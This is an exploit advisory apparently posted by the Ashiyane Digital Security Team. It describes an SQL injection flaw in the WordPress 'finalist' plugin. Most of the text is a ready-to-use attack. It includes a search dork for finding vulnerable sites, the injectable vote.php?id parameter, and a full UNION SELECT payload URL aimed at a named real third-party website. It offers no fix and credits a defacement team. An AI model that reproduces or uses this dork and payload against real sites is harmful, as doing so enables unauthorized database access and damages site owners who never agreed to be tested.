WordPress Finalist third party plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
de24cb85c27e3140bfb6cb282c818c326e61dc11a2adec14efb28b613e4b6d5a
++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++
++++++++++++++++
# Exploit Title: wordpress finalist plugins SQL injection Vulnerability #
#
# Exploit Author: Ashiyane Digital Security Team#
#
# Home : www.Ashiyane.org#
#
# Vendor Homepage: www.thefaceshop.com.sg#
#
# Software Link: www.wordpress.com#
#
# Tested on: Windows 7#
#
# Dork: inurl:"wp-content/plugins/finalist"#
#
=============================================================
#Location:site/wp-content/plugins/finalist/vote.php?id=[SQL]
#
#
#DEm0:http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=131+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
#
#
++++++++++++++++++++++++++++++++++
======================================
* Greetz to: My Lord Allah
* Sp Tnx To:
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in,B4b4K KH4TaR,sil3nt and all
Ashiyane Security [ Researcher Team AND Deface Team ]
* The Last One : My Self, tr0janman
*******
--------------------------------------------